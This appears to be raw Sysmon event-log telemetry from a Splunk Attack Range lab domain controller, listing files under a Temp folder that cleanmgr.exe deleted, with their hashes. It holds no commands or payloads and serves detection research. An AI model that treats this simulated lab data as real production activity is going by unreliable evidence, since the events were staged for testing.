07:57:49.891{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\IBSProvider.dllMD5=11DE34FCDB75E79A920D3B491F3E7BF0,SHA256=6B7C7AD8B1AD522B27B2CC5E4F76F56ADE4495D7D46CE4F997A68954F072AF17,IMPHASH=C755896FA14213058E34639A28868FBCtruetrue 23542300x80000000000000001051431Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.875{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\GenericProvider.dllMD5=397ED660129D40927A27B75A4B8FAE2E,SHA256=EAFCECFE911DABB4531E1331DDF2E119DCBB6B7A887D70BDE737EA76BE10EB74,IMPHASH=F55EE75573C110804DE5E50ACEEC1B06truetrue 23542300x80000000000000001051430Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.875{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\FolderProvider.dllMD5=6428B4D0C26DB23E9478F039891CD5C9,SHA256=55126BB099785C2F9CD32A30991082C47D62C8231D570A9D8A6F3CC599B25EE1,IMPHASH=B2CC5EDD42A866F7CB6CAE42DB969187truetrue 23542300x80000000000000001051429Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.875{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\FfuProvider.dllMD5=E27BC7F808E72F08372BA3C40B4B6344,SHA256=927B194432046C0D2ADF7C7B71E4BE85602C4D00A5D6EDA9F9DB9924E1C3447A,IMPHASH=8580AF5C1871319D05329DB2E96A8146truetrue 23542300x80000000000000001051428Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.875{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\WimProvider.dll.muiMD5=CC3B15540DDB521A300BAFF0BF4F902E,SHA256=33C06CC037DF1EBB72A15BCC2E09BC89DFEF7DD94441C650FD3D0C833122002A,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051427Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.875{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\VhdProvider.dll.muiMD5=10536C56F02E68EBD13D0B2CE8665C6A,SHA256=06C3B71D251A8DD47D02EDBFBE84E0B6B1D67956DE4D3996031434CBAD728929,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051426Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.875{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\UnattendProvider.dll.muiMD5=B7E3676672BE6851EA13ADD879C2945E,SHA256=2D2D82EE842CD346B58DCAFAE6FEC46D491E0D15CFBE0D8964A4AB7F18C5AAB9,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051425Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.875{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\TransmogProvider.dll.muiMD5=D5D596B1102DA565C2ED1FAAC170E758,SHA256=B5DBB36E947FD64AAF22C53F0A9634C7D72D4CC270C055B67E020920BF806909,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051424Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.875{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\SmiProvider.dll.muiMD5=CAD746ED5AF63E7FC49ED4A5A3984629,SHA256=016C6071B04E6D7E12AD9B8A85C002320331E01ED62922C573A1AC43BA0DD919,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051423Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.875{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\ProvProvider.dll.muiMD5=70AFEC86B6CF677BF8D3C713CA3281FB,SHA256=C8579EC95A51EB663FFC6145F0998C2F1930A6B8146C84C0A9094BCA4E5195A7,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051422Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.875{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\OSProvider.dll.muiMD5=A464DFEDEA8520616AA9B2ACD166A77F,SHA256=54E985CFF256CEBE82E9EF3E814A5FDA9FF730BCB50265E9BA78DE65A4DE3F42,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051421Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.875{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\OfflineSetupProvider.dll.muiMD5=CED788DBD9D13D0490B2F642B0B051F6,SHA256=D5DBC0A52B598800EE14569859383525950B865F4816E47E2E73F79AA1C32A09,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051420Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.859{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\MsiProvider.dll.muiMD5=5AE9ABD6BB469F3AD7B3A4CCD40974BF,SHA256=C2CE66F2F218890AA76F8BAB68B4C0FDCED0688E694F912F3A5BFABFA6CDB5E7,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051419Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.859{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\LogProvider.dll.muiMD5=0D4519BC8EB58A006E4A5EB993C0DCCF,SHA256=DAFFE67521F9B4657FBFEF9585234CB39293F9B866C0D97D66F675037515BB51,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051418Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.859{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\IntlProvider.dll.muiMD5=16ACB74928BC55FD4AAC316F3B92E1D7,SHA256=17CB486CADB679C75A27BA6C76E2FE714F4B8DA845E6F795759517D6734F0BC9,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051417Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.859{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\ImagingProvider.dll.muiMD5=26F5BBF8D6EE90B4F47C18E93D1087FB,SHA256=F41738FEF7140176447ECF371B1117A485E48BA6F3E9AFAA8C4F883ABFAE62DA,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051416Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.859{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\IBSProvider.dll.muiMD5=0B09FE334215A8E736B2CF08A50D5204,SHA256=DCE9AD3B79F91BEBEDDFCD9E03F1557CB7C6114AC906081E9E046F807093CDF1,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051415Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.859{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\GenericProvider.dll.muiMD5=956B8B45B92321C0D5975EE9A6C5B773,SHA256=578541D71466CF61EF399023B34EDFCBD915142BE856534AD4D17D25E7CC9F3D,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051414Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.859{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\FolderProvider.dll.muiMD5=DC4E4C2800DC6D98F7893044A21D246B,SHA256=8B4CE62F4E4294E701193C7AE393EB5EB29AA45932D376CB1A03728A140096AE,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051413Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.859{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\FfuProvider.dll.muiMD5=5ECAD70AC2B3A95CBB42D6FE67D2F726,SHA256=C210389DBB9B7B4A802E4B0C3C708B6F55B086564A01E19CFB183B6AF916C30A,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051412Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.859{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\DmiProvider.dll.muiMD5=38C2A1560C340537C3AE0CE04BDF7EAA,SHA256=52B06DFD85FB5AB1DCE2BE665CA144B1AE6658F518D1623D9B44C347C482B064,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051411Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.859{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\DismProv.dll.muiMD5=BD7B77B3EE9A12FF3F5446ECDF80B5C6,SHA256=B972A0B2C4682E9074441B481BD886DE19B8DB3DBA401B88E980B154C14D5A7E,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051410Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.859{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\DismCore.dll.muiMD5=C901FF639EDFBBE710D6E5882F07CD24,SHA256=9BDA61D23DC50F9AFA82DA94B06B7B9C8229D5ED666D2F5270DAE13100815C27,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051409Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.859{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\CompatProvider.dll.muiMD5=A2A344CB32B6835744A36D877C952665,SHA256=A74D765B796638A921C4810D1712A08F7A37C9BA9E91F4DFDCB9727611C3D18D,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051408Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.859{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\CbsProvider.dll.muiMD5=179B34BE97A383AF3E757031E7DA964B,SHA256=ABD3824664D1336EE849D89BA178606CC1B1E23E173752D8093F34A5580FA8F4,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051407Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.844{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\AssocProvider.dll.muiMD5=386FE7AC95738A0CB6D25DEA662991F1,SHA256=22DC7317108A528BA92C853330598F628B93FFF27CAC34C2F501B806A75261D9,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051406Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.844{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\en-US\AppxProvider.dll.muiMD5=9FF5081115C2C21D9F85AF7EE6D2CC63,SHA256=107B10A8C1426F1C0D703F06832D740A4CFDCAA596FA0EA147A32A736A7A2A4D,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051405Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.844{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\DmiProvider.dllMD5=FC76385FF00D4A93618D842B41716D8D,SHA256=BBD49A49CFFA8411FFA91B02541F5F3B5333FD9055BC129DDD3B36EB005C34D9,IMPHASH=062B279D8ED4374A0CD0C84620F4BE4Etruetrue 23542300x80000000000000001051404Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.844{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\DismProv.dllMD5=8C7D97E22045AE402EA896F514CEED81,SHA256=76D3202E11BA22D277532A14CAE60E596975C0D8C34C7BE154F453EB1F7C37EF,IMPHASH=0247CB1C8FD55E43A448E359883057DBtruetrue 23542300x80000000000000001051403Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.844{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\DismHost.exeMD5=A59C22B77871CC18970038B7FA43826F,SHA256=CB84B51713BAD689ABB96560E57A71B276D4B28B1C09C7116EE85F5782A1B144,IMPHASH=734010D3430DBD2CA51B599924FE1424truetrue 23542300x80000000000000001051402Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.828{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\DismCorePS.dllMD5=FB88731B484D1FF4AFF5DB75A20799FA,SHA256=EA155388211E0C3CEF2C99BD5F341C9F93F1ECDA6F21096DB6F9DB2110686A52,IMPHASH=65E10DCEA11F7117C161DC7557B87689truetrue 23542300x80000000000000001051401Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.828{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\DismCore.dllMD5=F1AB58CACD95921A04225222D03CDEA0,SHA256=EDE89F377FD46F95639413411CDA072D9FF63E72A399B26AB4870094F145091B,IMPHASH=B7B56C790C8AB7134B0680D8DFE46658truetrue 23542300x80000000000000001051400Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.828{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\CompatProvider.dllMD5=E5C1D020198EBEC1D5ABA640C9A600D0,SHA256=A80FD2846E05AB491BDAAFCE8854A04549A852066B82B90D757D9B6A44ADA8C8,IMPHASH=2CDD615C09EED7B572606B2A0C0EFD2Ftruetrue 23542300x80000000000000001051399Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.812{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\CbsProvider.dllMD5=D4A64C7C50D0C6BE9F8770177E2264BF,SHA256=E6505F9DBE17DF9E7E52B5FE1720E1F6482B25D262A47A320CF438C5FD5A5797,IMPHASH=99D5DC4FF67AB12670853DD4E32E8358truetrue 23542300x80000000000000001051398Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.812{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\AssocProvider.dllMD5=56CB83B3454882509791FBA62832BC87,SHA256=5B01524CC03B6EB58CC9E0FF479014EAF89EE7FDE2791BFF871BC90274D200AC,IMPHASH=83F73507B4613B09C6FA825535D8A81Etruetrue 23542300x80000000000000001051397Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.812{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31660C42A1C5A59EA25F11FFC126FD56,SHA256=CAD4E2158744C1B93D153FE4DF35B46F46D16BACBC5F18E58A39C3C27EFDAF1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051396Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.812{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\AppxProvider.dllMD5=8F6792DF9EC54934B76A68B1D7B66ECA,SHA256=E57CB2D5CEC5E1354F4E31CD08ADA02FCAA0E2DEA4B28C8F61683BFA3E875C05,IMPHASH=F1558CACACA712554EBD5926B4B3FE52truetrue 23542300x80000000000000001051395Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.791{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-service-winsvc-l1-1-0.dllMD5=09934F0F7227B9489D117C26EC20CD14,SHA256=CBE408A0AFF90986A6A7DDF022F96302B4FADD08A0C3C166CAC7A64D6ABF041D,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051394Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.791{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-service-private-l1-1-1.dllMD5=484ED248F1A72C6E4E6F6C3F5A3339ED,SHA256=00E14515FE6FEBBF3C2CFC89A6F1A3D6F48B3E7A5EB08D50DADF69CE3F34CC47,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051393Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.791{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-service-private-l1-1-0.dllMD5=FEBE55EA884F3C1EE45ADE2734AA6BE6,SHA256=CD51DF334A600117133C9C8100DDE766D980456988FD333A40BE5A81C8092340,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051392Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.791{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-service-management-l2-1-0.dllMD5=0D45D811001E0A7683A2B7CA8A883874,SHA256=F44E2A85D7507159AE115C85C3497C57BE4ECB2D6ADDB30A534110266D56F92F,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051391Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.791{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-service-management-l1-1-0.dllMD5=C36912B3A28B06F5BB24FE9BE49DA4D3,SHA256=D737A832C0D595E8E52846C2D748B911D7155E372F43FBB10513CFDE0BBF83B7,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051390Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.775{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-service-core-l1-1-1.dllMD5=A86D518BCF3970C17A1768792FDF37FF,SHA256=AB5CC1B14D6BB708B5C87C2622DA886E2119A6997E08108CCE36080385DAEE71,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051389Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.775{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-service-core-l1-1-0.dllMD5=A329C75641638E2FFA11087F614FD4C1,SHA256=5071AA303D436407D195EF37889F018BE7E350DA5E690793587458D4C6D308DB,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051388Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.775{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-security-sddl-l1-1-0.dllMD5=C6C6C3E4D7CFA93246362901750A94D9,SHA256=6E274ABE823EF8B30629A99D9F942794C9FE6D003021A0C5085B49A7D8611DDE,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051387Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.775{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-security-provider-L1-1-0.dllMD5=207B5716605CA4850629F3E2FFFA07BB,SHA256=BE6E6284F69C76BE6366EA8D44D85BDBAB6A71DD42E8B5575CFDF671AD58DCA2,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051386Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.775{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-security-lsapolicy-l1-1-0.dllMD5=FE7AD7265E296947172B8C491E8109D2,SHA256=4D231AC65F0F54BFF45CACFFE7DF3109CF87F78D14960EC8F03654E605AC8ABF,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051385Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.775{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-Security-Lsalookup-L2-1-1.dllMD5=EBD6475839F5C99FB8855A80E0FC2AF1,SHA256=F519C7AA6930DAC83A3045CEEE42F64F26FFC54254D5ABD1B0F7D99C47569A30,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051384Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.775{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\API-MS-Win-Security-Lsalookup-L2-1-0.dllMD5=AC284A6251F5D26633AF48D918D09628,SHA256=F7A34B793AACF75DA4EAE843B6088C0BAAA8B835EA5F6A65E72EBD9A1479C8A8,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051383Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:49.775{466BC892-F5CA-60EB-6B7D-00000000CF01}1076ATTACKRANGE\AdministratorC:\Windows\system32\cleanmgr.exeC:\Users\ADMINI~1\AppData\Local\Temp\28BCB6C9-D54C-4681-ABB0-940E81A362FA\api-ms-win-security-cryptoapi-l1-1-0.dllMD5=DE0A49D4B2E9A5FA6762BD191C622B32,SHA256=AB12FEAF15CB313812B01AFE1198B62E72F7702D140830ABAD2CFB6251E82A7C,IMPHASH=00000000000000000000000000000000truetrue 23542300x80000000000000001051382Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 